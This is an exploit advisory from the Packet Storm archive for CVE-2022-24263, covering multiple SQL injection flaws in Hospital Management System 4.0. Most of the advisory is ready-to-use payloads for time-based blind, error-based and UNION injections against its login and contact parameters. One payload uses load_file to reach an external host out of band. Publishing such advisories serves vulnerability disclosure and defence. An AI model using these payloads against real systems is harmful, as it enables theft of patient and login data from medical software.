exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hospital Management System 4.0 SQL Injection

Hospital Management System 4.0 SQL Injection
Posted Feb 7, 2022
Authored by nu11secur1ty

Hospital Management System version 4.0 suffers from multiple remote SQL injection vulnerabilities. Original discovered of SQL injection in this version is attributed to Metin Yunus Kandemir in January of 2020.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2022-24263
SHA-256 | 8aa7261867e80ac5e4a940453a18ba7ef770788d561b7023159883028ca0fbfd

Hospital Management System 4.0 SQL Injection

Change Mirror Download
## Title: Hospital Management System v4.0 Multiple SQL-Injections
## Author: nu11secur1ty
## Date: 02.06.2022
## Vendor: https://github.com/kishan0725
## Software: https://github.com/kishan0725/Hospital-Management-System
## CVE-2022-24263


## Description:
The Hospital Management System v4.0 is suffering from Multiple
SQL-Injections via three parameters in function.php, contact.php, and
func3.php applications.
The attacker can be receiving the all information from the system by
using this vulnerability, and also the malicious actor can use
sensitive information from the customers of this system.
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: txtName (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtName=821761' AND (SELECT 9346 FROM
(SELECT(SLEEP(3)))HJGv) AND
'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select
load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send
Message&txtMsg=441931
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)
OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN
1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login

Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)
UNION ALL SELECT
8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY
CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0
END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login

Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT
CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
---

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263)

## Proof and Exploit:
[href](https://streamable.com/m4hnm1)

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close